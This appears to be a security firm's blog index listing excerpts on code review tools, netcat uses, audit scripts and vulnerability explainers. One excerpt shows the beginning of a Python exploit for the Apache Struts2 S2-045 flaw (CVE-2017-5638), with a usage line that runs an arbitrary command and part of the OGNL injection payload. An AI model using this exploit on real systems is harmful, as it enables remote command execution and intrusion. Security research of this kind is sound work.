BLOG

Useful tools to use alongside dedicated solutions when performing application source code vulnerability assessments

BLOG, Cybersecurity Lab, Security Toolkit, Toolkit / /

Most application source code vulnerability assessments involve reviewing a large volume of source files.In general, this work is performed through a combination of static analysis using dedicated tools such as Fortify and manual dynamic analysis conducted by experienced security consultants.Given the substantial amount of source code that must be manually reviewed during this process, it […]

Netcat Usage Examples

BLOG, Cybersecurity Lab, Security Toolkit, Toolkit / /

* Telnet Connection * Server-to-Server Chat * Connect via IPv6 (-6: IPv6, -4: IPv4) * copying a file * Hard Drives & partition Clone * port scanning * Send the “quit” command across the port range to check for responses (version information). * Simple web-page (somepage.html) service

PHP Security Audit

BLOG, Cybersecurity Lab, Script, Security Toolkit / /

php_aduit_script.php <?php   /** * PHP Security Check Script * http://php-security-audit.com/ * * This security check script will evaluate the PHP runtime environment * for your configuration to determine whether any improvements could be * made to your configuration. * * * * * * * * * * Revision History * * 2009-05-08 –

Active Directory Bad Password Account Audit Script (PowerShell)

Cybersecurity Lab, Script, Security Toolkit / /

Active Directory is widely used, regardless of the size of the company or organization, to control access to internal resources.However, there are still very few organizations that perform security assessments tailored to the specific characteristics of Active Directory services.Key focus areas for an Active Directory security assessment include the Domain Controller, Group Policy, user accounts,

Python Detection Script for the Struts2 Vulnerability (CVE-2017-5638 – Apache Struts2 S2-045) Actively Targeted from China

Cybersecurity Lab, Script, Security Toolkit / /

(*) Reference: https://github.com/rapid7/metasploit-framework/issues/8064 * usage: $python struts2_S2-045.py <URL> <CMD> $python struts2_S2-045.py http://127.0.0.1:8080/2.3.15.1-showcase/showcase.action “ls -al” [ struts2_S2-045.py – Python Code ] #!/usr/bin/python # -*- coding: utf-8 -*- import urllib2 import httplib def exploit(url, cmd): payload = “%{(#_=’multipart/form-data’).” payload += “(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).” payload += “(#_memberAccess?” payload += “(#_memberAccess=#dm):” payload += “((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).” payload += “(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).” payload += “(#ognlUtil.getExcludedPackageNames().clear()).” payload +=

NLP Deep Learning Models (HF-based)

BLOG, AI Security Lab, PRATICAL TIPS / /

In the world of NLP, new models pop up almost every day, making it hard to keep track of them all. Our development team needed a way to summarize and organize key details about these models, so we decided to do some research. We started by analyzing all the models listed on Hugging Face, gathering

SERVICE – INADEQUATE PERMISSION VALIDATION

BLOG, Security Insight / /

Vulnerability examples   Inadequate authorization checks gaps/weaknesses that allow unauthorized users to view, modify, or delete sensitive information without going through a valid authentication process when submitting a request to a website. For example, when you edit an article on an ad, the following HTTP request is sent. The website creates a unique profile for each

SERVICE-OPEN SOURCE FILE UPLOAD VULNERABILITY

BLOG, Security Insight / /

Vulnerability example    Web sites use open source tools to help manage and edit web files. Since the code is open source, security vulnerabilities can also be easily discovered, Therefore, developers/individuals need to be careful when using open source because security is open to all.   Once an attacker has confirmed that an open source library

COMMAND INJECTION IN MOBILE AND IOT

BLOG, Cybersecurity Lab, Security Insight / /

Vulnerability examples    Many IoT devices such as dual-mode routers, IP cameras, and door locks provide their management services, such as providing information or changing settings, through web pages using HTTP. These management pages come from CGI files that are already compiled into the firmware. These CGI files, when needed as specific inputs in the